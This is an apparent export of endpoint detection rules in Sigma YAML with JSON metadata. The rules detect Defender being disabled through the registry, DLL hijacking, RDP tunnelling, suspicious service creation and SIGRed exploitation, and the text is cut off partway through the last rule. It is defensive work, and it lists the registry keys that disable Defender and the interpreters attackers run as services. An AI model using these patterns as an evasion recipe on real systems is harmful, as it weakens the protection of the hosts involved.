"content": "title: Windows Defender Disabled in Registry\nid: d7778b81-d88b-4182-8bf9-14ade4b1124c\ndescription: |\n Detects Windows Defender being disabled using the registry.\n Attackers might disable Windows Defender to evade detection.\n It is recommended to investigate the process responsible for the registry modification, as well as to look for other suspicious activities on the host.\nreferences:\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2020/09/25\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_global:\n EventType: SetValue\n TargetObject:\n # Legacy global toggle\n - 'HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware'\n # Real-time monitoring toggle\n - 'HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring'\n - 'HKLM\\Software\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring'\n # For registry/events/process monitoring\n - 'HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring'\n - 'HKLM\\Software\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring'\n # For process scan when realtime monitoring is turned on again\n - 'HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableScanOnRealtimeEnable'\n - 'HKLM\\Software\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableScanOnRealtimeEnable'\n # For files/programs activity monitoring\n - 'HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection'\n - 'HKLM\\Software\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection'\n # For downloaded files\n - 'HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection'\n - 'HKLM\\Software\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection'\n Details|contains: 'DWORD' # Any non-zero value works, not just DWORD (0x00000001)\n\n # When the agent is under a lot of pressure, the parent information of a process can be missing.\n # Exceptionnaly for this rule, because it triggers so frequently with a low severity, we will ignore\n # its instances where the parent is missing.\n # When the parent is missing, the ParentImage or ParentCommandLine field is also missing (it is not empty or null)\n # so we can't easily match against that.\n # Instead, we reverse the problem by requiring the ParentImage fields to contain a `\\`.\n ProcessParentImage|contains: '\\'\n\n #\n # DisableAntiSpyware is deprecated in recent versions of Windows 10.\n # Setting this value to true will not change Microsoft Defender Antivirus behavior on client devices (both managed and unmanaged). This setting only applies to Windows Server.\n #\n # DisableAntiSpyware is intended to be used by OEMs and IT Pros to disable Microsoft Defender Antivirus and deploy another antivirus product during deployment.\n # So, the presence of another antivirus product led to set this value by MsMpEng.exe.\n #\n # https://docs.microsoft.com/en-au/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware\n # https://www.windowslatest.com/2020/08/19/microsoft-retires-disableantispyware-for-windows-defender/\n #\n\n selection_antispyware:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows Defender\\DisableAntiSpyware'\n Details|contains: 'DWORD' # Any non-zero value works, not just DWORD (0x00000001)\n filter_antispyware:\n Image|endswith: '\\MsMpEng.exe'\n ProcessIntegrityLevel: 'System'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n filter_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_msmpeng:\n Image:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n - '?:\\Program Files\\Microsoft Security Client\\MsMpEng.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n - ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n - ProcessAncestors|contains: '|?:\\Windows\\CCM\\CcmExec.exe|'\n\n exclusion_setupplatform:\n Image|endswith: '\\Sources\\setupplatform.exe' # C:\\$WINDOWS.~BT\\Sources\\setupplatform.exe\n\n exclusion_avast:\n Image:\n - '?:\\Program Files\\Avast Software\\Avast\\wsc_proxy.exe'\n - '?:\\Program Files\\AVG\\Antivirus\\wsc_proxy.exe'\n - '?:\\Program Files\\AVAST Software\\Avast Business\\wsc_proxy.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Avast Software s.r.o.'\n - 'AVG Technologies USA, LLC'\n\n exclusion_trend_micro:\n Image: '?:\\Program Files (x86)\\Trend Micro\\\\*'\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n exclusion_defender:\n ProcessParentImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseCM.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\SenseCM.exe'\n\n exclusion_deviceenroller:\n - ProcessCommandLine|startswith: '?:\\WINDOWS\\system32\\deviceenroller.exe /o ????????-????-????-????-????????????'\n ProcessParentCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_svchost:\n ProcessCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k secsvcs'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_omadmclient:\n ProcessImage: '?:\\WINDOWS\\system32\\omadmclient.exe'\n\n exclusion_wapt:\n ProcessParentImage: '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n\n exclusion_mousocoreworker:\n ProcessOriginalFileName: 'MoUSOCoreWorker.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_msiexec:\n ProcessCommandLine:\n - '?:\\Windows\\syswow64\\MsiExec.exe -Embedding ???????????????????????????????? E Global\\MSI0000'\n - '?:\\Windows\\System32\\MsiExec.exe -Embedding ???????????????????????????????? E Global\\MSI0000'\n ProcessParentCommandLine: '?:\\Windows\\system32\\msiexec.exe /V'\n\n exclusion_santivirus:\n ProcessImage: '?:\\Program Files (x86)\\Digital Communications\\SAntivirus\\SAntivirusService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Digital Communications Inc'\n\n exclusion_emsystem:\n ProcessImage: '?:\\Program Files\\AppSense\\Environment Manager\\Agent\\EmSystem.exe'\n\n exclusion_userprofile_config:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_windows_management:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s WManSvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ansible:\n ProcessCommandLine|contains:\n # \"Ansible requires PowerShell v3.0 or newer\" UTF-16LE with all 3 offsets\n - 'QQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByA'\n - 'EAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcg'\n - 'BAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIA'\n\n exclusion_loadstate:\n ProcessOriginalFileName: 'LoadState.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_intune:\n ProcessImage: '?:\\Windows\\System32\\omadmclient.exe'\n\n condition: (selection_global or (selection_antispyware and not filter_antispyware)) and not filter_zero and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d7778b81-d88b-4182-8bf9-14ade4b1124c",
"rule_name": "Windows Defender Disabled in Registry",
"rule_description": "Detects Windows Defender being disabled using the registry.\nAttackers might disable Windows Defender to evade detection.\nIt is recommended to investigate the process responsible for the registry modification, as well as to look for other suspicious activities on the host.\n",
"rule_creation_date": "2020-09-25",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d780843d-b5c3-477b-bfc0-6468888ffaa0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599890Z",
"creation_date": "2026-03-23T11:45:34.599893Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599901Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wsmanhttpconfig.yml",
"content": "title: DLL Hijacking via wsmanhttpconfig.exe\nid: d780843d-b5c3-477b-bfc0-6468888ffaa0\ndescription: |\n Detects potential Windows DLL Hijacking via wsmanhttpconfig.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wsmanhttpconfig.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DSROLE.dll'\n - '\\HTTPAPI.dll'\n - '\\mi.dll'\n - '\\miutils.dll'\n - '\\wsmsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d780843d-b5c3-477b-bfc0-6468888ffaa0",
"rule_name": "DLL Hijacking via wsmanhttpconfig.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wsmanhttpconfig.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d78a7360-f203-4d53-b8fb-f75fa596dd1a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612849Z",
"creation_date": "2026-03-23T11:45:34.612853Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612860Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1519710302820089857",
"https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel",
"https://attack.mitre.org/software/S0508/",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1572_rdp_protocol_tunneling.yml",
"content": "title: RDP Logon via Network Tunnel\nid: d78a7360-f203-4d53-b8fb-f75fa596dd1a\ndescription: |\n Detects uncommon applications performing loopback connections on IPv4 or IPv6 to the local RDP port.\n Attackers may tunnel network communications through different protocols to avoid network filters and expose services.\n Usually, this is done by establishing an internal port forward from an exposed port to a local port associated with the desired service.\n It is recommended to verify the legitimacy of the process and for suspicious RDP activity on the system.\nreferences:\n - https://twitter.com/malmoeb/status/1519710302820089857\n - https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel\n - https://attack.mitre.org/software/S0508/\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2023/02/13\nmodified: 2026/03/03\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n SourceIp:\n - '::1'\n - '::ffff:7f00:1'\n - '127.0.0.1'\n - '::ffff:127.0.0.1'\n DestinationIp:\n - '::1'\n - '127.0.0.1'\n - '::ffff:7f00:1'\n - '::ffff:127.0.0.1'\n Initiated: 'true'\n DestinationPort: '3389'\n\n # This is handled by the rule 49ed1286-c309-4fb0-bcfc-67f8039069c4\n filter_ngrok:\n - ProcessImage|endswith: '\\ngrok.exe'\n - ProcessProduct: 'ngrok agent'\n - ProcessImphash: 'FF9F3A86709796C17211F9DF12AAE74D'\n\n exclusion_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_forward:\n SourcePort: '3390'\n\n exclusion_browsers:\n Image|endswith:\n - '\\chrome.exe'\n - '\\chromium.exe'\n - '\\firefox.exe'\n - '\\brave.exe'\n - '\\librewolf.exe'\n - '\\msedge.exe'\n - '\\msedgewebview2.exe'\n - '\\iexplorer.exe'\n - '\\safari.exe'\n - '\\opera.exe'\n - '\\SmartBrowser-Blink.exe'\n - '\\vivaldi.exe'\n - '\\CefSharp.BrowserSubprocess.exe'\n - '\\AvastBrowser.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k tsgateway'\n - '?:\\Windows\\system32\\svchost.exe -k tsgateway -s TSGateway'\n\n exclusion_mstsc:\n ProcessImage: '?:\\Windows\\System32\\mstsc.exe'\n\n exclusion_wudfhost:\n ProcessImage: '?:\\Windows\\System32\\WUDFHost.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_ipdiva:\n ProcessImage|endswith: '\\bin\\IPdivaGateway.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Systancia SA'\n\n exclusion_intel:\n ProcessImage: '?:\\Windows\\System32\\DriverStore\\FileRepository\\dtt_sw.inf_amd64_*\\ipfsvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Intel Corporation'\n\n exclusion_ingate:\n ProcessImage|endswith: '\\xGate.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Axeda Corporation'\n\n exclusion_connectwise:\n ProcessImage|endswith: '\\LTSVC.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Connectwise, LLC'\n\n exclusion_zabbix:\n - ProcessAncestors: '|?:\\Program Files\\Zabbix Agent 2\\zabbix_agent2.exe|'\n - ProcessCompany: 'Zabbix SIA'\n ProcessDescription: 'zabbix_agent2.exe'\n\n # too many monitoring script using powershell\n exclusion_powershell:\n Image: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n\n exclusion_sap:\n - ProcessImage|endswith: '\\SAP BusinessObjects Enterprise *\\win64_x64\\sapjvm\\bin\\java.exe'\n - ProcessCommandLine|endswith: '\\tomcat\\bin\\tomcat?.exe //RS//BOEXI40Tomcat'\n\n exclusion_telnet:\n ProcessImage: '?:\\Windows\\System32\\telnet.exe'\n\n exclusion_perplexity:\n ProcessOriginalFileName: 'comet.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'PERPLEXITY AI, INC.'\n\n exclusion_ecosia:\n ProcessOriginalFileName: 'chrome.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ecosia GmbH'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d78a7360-f203-4d53-b8fb-f75fa596dd1a",
"rule_name": "RDP Logon via Network Tunnel",
"rule_description": "Detects uncommon applications performing loopback connections on IPv4 or IPv6 to the local RDP port.\nAttackers may tunnel network communications through different protocols to avoid network filters and expose services.\nUsually, this is done by establishing an internal port forward from an exposed port to a local port associated with the desired service.\nIt is recommended to verify the legitimacy of the process and for suspicious RDP activity on the system.\n",
"rule_creation_date": "2023-02-13",
"rule_modified_date": "2026-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d79a2117-2edd-4df0-8347-ad9c7f0bb970",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296295Z",
"creation_date": "2026-03-23T11:45:35.296299Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296306Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/blue-mockingbird-cryptominer/",
"https://redcanary.com/threat-detection-report/techniques/windows-service/",
"https://attack.mitre.org/techniques/T1543/003/"
],
"name": "t1543_003_suspicious_service_created.yml",
"content": "title: Suspicious Service Created\nid: d79a2117-2edd-4df0-8347-ad9c7f0bb970\ndescription: |\n Detects the creation of a Windows service that references executables and paths used commonly by attackers, such as powershell.exe, cmd.exe, or \"C:\\Windows\\Temp\".\n Attackers may create Windows services to establish persistence.\n It is recommended to investigate the command-line of the service, as well as the context execution of the process that created the detected sevice.\nreferences:\n - https://redcanary.com/blog/blue-mockingbird-cryptominer/\n - https://redcanary.com/threat-detection-report/techniques/windows-service/\n - https://attack.mitre.org/techniques/T1543/003/\ndate: 2025/10/03\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.003\n - classification.Windows.Source.Service\n - classification.Windows.Behavior.ServiceCreation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: service\n product: windows\ndetection:\n selection:\n OperationType: 'create'\n ServiceCommandLine|contains:\n # Scripts and shells\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\pwsh.exe'\n - '\\python.exe'\n - '\\python3.exe'\n - '\\python2.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\rundll32.exe'\n - '\\mshta.exe'\n # Suspicious folders\n - ':\\PerfLogs\\'\n - ':\\Users\\\\*\\AppData\\Roaming\\'\n - ':\\Users\\\\*\\AppData\\LocalLow\\'\n - ':\\Users\\Default\\'\n - ':\\Users\\Public\\'\n # Filter out empty images\n ProcessImage|contains: '?'\n\n exclusion_hpqwmiex:\n ProcessImage|endswith: '\\AppData\\Roaming\\\\*\\hpqwmiex.exe'\n ServiceCommandLine|contains: '\\AppData\\Roaming\\\\*\\hpqwmiex.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\nissrv.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n exclusion_f5:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'F5 Networks Inc'\n - 'F5, Inc.'\n\n exclusion_zoom:\n ProcessSigned: 'true'\n ProcessSignature: 'Zoom Video Communications, Inc.'\n\n exclusion_veam:\n ServiceCommandLine: '?:\\Windows\\Temp\\Veeam.SQL.*\\Veeam.SQL.Service.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_nable:\n ServiceName: 'NableRemoteService'\n\n exclusion_eset:\n ProcessSigned: 'true'\n ProcessSignature: 'ESET, spol. s r.o.'\n\n exclusion_logmein:\n ServiceCommandLine|contains:\n - '?:\\Program Files (x86)\\LogMeIn Rescue Applet\\'\n - '?:\\Program Files\\LogMeIn Rescue Applet\\'\n\n exclusion_assist:\n ProcessSigned: 'true'\n ProcessSignature: 'RG Systèmes SAS'\n\n exclusion_truecrypt:\n ProcessSigned: 'true'\n ProcessSignature: 'TrueCrypt Foundation'\n\n exclusion_opswat:\n ProcessSigned: 'true'\n ProcessSignature: 'OPSWAT, Inc.'\n\n exclusion_iobit:\n ProcessSigned: 'true'\n ProcessSignature: 'IObit CO., LTD'\n\n exclusion_veracrypt:\n ServiceCommandLine|endswith: '\\VeraCrypt\\veracrypt-x64.sys'\n ServiceName: 'veracrypt'\n ProcessImage|endswith:\n - '\\VeraCrypt\\VeraCrypt.exe'\n - '\\VeraCrypt\\VeraCrypt-x64.exe'\n\n exclusion_dhcp_srv:\n ServiceName: 'DHCPServer'\n ServiceCommandLine|endswith: '\\dhcpsrv*\\dhcpsrv.exe\" -service'\n\n exclusion_rustdesk:\n ProcessGrandparentImage|endswith: '\\rustdesk\\rustdesk.exe'\n ServiceName: 'RustDesk'\n\n exclusion_fancontrol:\n ServiceName: 'R0FanControl'\n ServiceCommandLine|endswith: '\\fancontrol-v*\\FanControl.sys'\n\n exclusion_openhardwaremonitor:\n ServiceName: 'WinRing0_1_2_0'\n ServiceCommandLine|endswith: '\\OpenHardwareMonitorLib.sys'\n\n exclusion_sharepoint:\n ServiceCommandLine|contains: '\\Microsoft\\SPMigration\\Bin\\Microsoft.SharePoint.Migration.ClientService.exe'\n ProcessImage: '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\InstallUtil.exe'\n\n exclusion_oracle:\n ServiceCommandLine|contains: '\\bin\\ORACLE.EXE'\n ServiceName|contains: 'Oracle'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d79a2117-2edd-4df0-8347-ad9c7f0bb970",
"rule_name": "Suspicious Service Created",
"rule_description": "Detects the creation of a Windows service that references executables and paths used commonly by attackers, such as powershell.exe, cmd.exe, or \"C:\\Windows\\Temp\".\nAttackers may create Windows services to establish persistence.\nIt is recommended to investigate the command-line of the service, as well as the context execution of the process that created the detected sevice.\n",
"rule_creation_date": "2025-10-03",
"rule_modified_date": "2026-02-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d7bedad5-e7a1-408b-aad1-6e5919a2de49",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076940Z",
"creation_date": "2026-03-23T11:45:34.076942Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076947Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2020-1350",
"https://www.logpoint.com/fr/blog/serveurs-windows-dns-vulnerabilite-cve-2020-1350/",
"https://attack.mitre.org/techniques/T1210/"
],
"name": "t1210_dns_spawning_abnormal_processes.yml",
"content": "title: Abnormal Process Started by dns.exe\nid: d7bedad5-e7a1-408b-aad1-6e5919a2de49\ndescription: |\n Detects the execution of an abnormal process by dns.exe.\n This action can be indicative of the exploitation of CVE-2020-1350 (aka SIGRed), a vulnerability in Microsoft's Domain Name System (DNS) implementation on Windows Server versions from 2003 to 2019.\n To exploit this vulnerability, an unauthenticated attacker needs to send malicious requests to a vulnerable Windows DNS server.\n If successfully exploited, the vulnerability allows the attacker to run arbitrary code in the context of the Local System Account.\n It is recommended to investigate the process tree for suspicious activities and to isolate the infected system if the exploitation is confirmed.\nreferences:\n - https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2020-1350\n - https://www.logpoint.com/fr/blog/serveurs-windows-dns-vulnerabilite-cve-2020-1350/\n - 